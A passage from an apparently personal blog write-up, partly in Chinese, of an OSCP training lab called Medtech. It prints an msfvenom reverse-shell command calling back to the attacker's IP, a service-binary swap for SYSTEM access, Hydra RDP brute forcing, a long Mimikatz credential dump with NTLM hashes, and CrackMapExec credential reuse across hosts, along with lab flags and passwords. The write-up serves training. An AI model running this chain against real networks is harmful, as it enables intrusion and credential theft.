        SERVICE_START_NAME : LocalSystem

msfvenom 構造shell 並替換原本的exe

msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.45.172 lport=443 -f exe > auditTracker.exe

copy \\192.168.45.172\giwawa\auditTracker.exe C:\DevelopmentExecutables\

sc start auditTracker

FLAG

# c:\Users\Administrator\Desktop\proof.txt
5899c2a5197757493f520d8e06845c01

# c:\Users\wario\Desktop\local.txt
850f101e2e7bedd23b32b6099528f6b4

172.16.218.12 (DEV04)

透過hydra測到可rdp

1
2
3

proxychains4 -q hydra -L user -P pass -M result.txt rdp -V

[3389][rdp] host: 172.16.218.12   login: yoshi   password: Mushroom!

rdp連線

1	`proxychains4 -q xfreerdp /v:172.16.218.12 /u:'yoshi' /p:'Mushroom!' /size:'80%'`

在c:/temp找到backup.exe

1	`把他替換成我產的shell.exe，他就回連了`

FLAG

# c:\Users\Administrator\Desktop\proof.txt
b8857321bea6cefa49ed5373d94e88a4

# c:\Users\yoshi\Desktop\local.txt
39d23ebfcf8cc5a32cc8d9e61df3031b

Mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 4536956 (00000000:00453a7c)
Session           : RemoteInteractive from 2
User Name         : yoshi
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 10/31/2023 2:27:00 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1110
	msv :	
	 [00000003] Primary
	 * Username : yoshi
	 * Domain   : MEDTECH
	 * NTLM     : fdf36048c1cf88f5630381c5e38feb8e
	 * SHA1     : 46d778aa60c13155094d085faef70a1f92442773
	 * DPAPI    : 3428d1f5289eb8cbec90bd5f761f4666
	tspkg :	
	wdigest :	
	 * Username : yoshi
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : yoshi
	 * Domain   : MEDTECH.COM
	 * Password : (null)
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 4502784 (00000000:0044b500)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 10/31/2023 2:26:59 AM
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 393656 (00000000:000601b8)
Session           : Interactive from 1
User Name         : leon
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/11/2023 5:34:08 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1105
	msv :	
	 [00000003] Primary
	 * Username : leon
	 * Domain   : MEDTECH
	 * NTLM     : 2e208ad146efda5bc44869025e06544a
	 * SHA1     : 8d1c9e13d2d2c20dbee8b4eacb20b73f06573c96
	 * DPAPI    : a7bad14f64c3cf0d7ae2b5f6392a0b6d
	tspkg :	
	wdigest :	
	 * Username : leon
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : leon
	 * Domain   : MEDTECH.COM
	 * Password : (null)
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 73115 (00000000:00011d9b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 67fde543d7569ef3fd265e13c9a5a180
	 * SHA1     : 3a64719b89867334fb51febe96e1e47187619050
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 27 93 22 6e 7f c1 1b dc 2d 10 21 d1 ec c6 d0 e9 fa a0 23 30 24 8a 68 d2 8d 65 fb 5b f0 2a cd b4 0d 2b 3c cd 2f 55 45 aa 27 86 7c 0f 92 28 d7 4c 57 f9 b3 c0 07 b6 27 db 48 56 50 46 9b dc 81 50 09 5c 10 c3 2c 0a 26 81 d0 29 03 18 5f 01 26 55 a9 09 94 d2 ef 31 9a 77 6e a4 28 a5 83 eb 2a 41 47 b7 2a fa e6 2a 54 ee 60 4e 0a d2 69 4b c9 fd 7f e3 94 37 07 87 ea 85 9c f9 5f e7 f0 fe 1d b8 e2 55 8b f4 fb 01 b0 9c 12 4a 81 bf 5d 5b 2a 66 c4 a0 21 6d 73 08 38 3a 0b 67 29 24 fa 0d 31 86 b8 69 cd 43 0c a3 d3 d3 25 51 9f 72 20 6c 58 47 4b 8e 83 c4 e0 5b d2 ed fb a2 6b 1f 09 c5 69 f3 f3 21 1e f0 32 5b 2e 13 6a e3 c3 ab 1e a2 9c 73 03 2c ba 4a d8 05 f0 f1 9c ff 3d 0a c3 93 96 b4 19 09 5e b3 6d 69 dd b3 4f 9c 2f 0a e7 f9 f1 6b 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 73097 (00000000:00011d89)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DEV04$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : dev04$
	 * Domain   : MEDTECH.COM
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 42882 (00000000:0000a782)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 42860 (00000000:0000a76c)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 4503230 (00000000:0044b6be)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 10/31/2023 2:26:59 AM
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 4502013 (00000000:0044b1fd)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 10/31/2023 2:26:59 AM
SID               : S-1-5-96-0-2
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : DEV04$
	 * Domain   : medtech.com
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 394223 (00000000:000603ef)
Session           : Interactive from 1
User Name         : leon
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 7/11/2023 5:34:08 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1105
	msv :	
	 [00000003] Primary
	 * Username : leon
	 * Domain   : MEDTECH
	 * NTLM     : 2e208ad146efda5bc44869025e06544a
	 * SHA1     : 8d1c9e13d2d2c20dbee8b4eacb20b73f06573c96
	 * DPAPI    : a7bad14f64c3cf0d7ae2b5f6392a0b6d
	tspkg :	
	wdigest :	
	 * Username : leon
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : leon
	 * Domain   : MEDTECH.COM
	 * Password : rabbit:)
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:44 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 41731 (00000000:0000a303)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * NTLM     : 1a8a7101a5ac64026be6b17a9f814176
	 * SHA1     : 65f787c2ade635cb08cc1d852637f240c0236e5f
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	
	cloudap :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DEV04$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 7/11/2023 5:33:43 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DEV04$
	 * Domain   : MEDTECH
	 * Password : (null)
	kerberos :	
	 * Username : dev04$
	 * Domain   : MEDTECH.COM
	 * Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23 
	ssp :	
	credman :	
	cloudap :

找到一個新cred

1
2
3

* Username : leon
* Domain   : MEDTECH.COM
* Password : rabbit:)

cme

proxychains4 -q crackmapexec smb result.txt -u leon -p 'rabbit:)' 

SMB         172.16.218.10   445    DC01             [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB         172.16.218.13   445    PROD01           [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB         172.16.218.11   445    FILES02          [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB         172.16.218.83   445    CLIENT02         [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB         172.16.218.12   445    DEV04            [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB         172.16.218.82   445    CLIENT01         [+] medtech.com\leon:rabbit:) (Pwn3d!)

172.16.218.10 (DC01)

1 2	`# c:\Users\Administrator\Desktop\proof.txt 9d1614855c69ed6e5afd0d22c4fa8263`

在desktop找到cred
1
web01: offsec/century62hisan51

OSCP

#OSCP

OSCP-Medtech

https://luoming1995125.github.io/2023/11/01/OSCP-Medtech/

作者

Peter Luo

發布於

2023年11月1日

許可協議

OSCP-OSCP B 上一篇

AIS3-EOF-2023 下一篇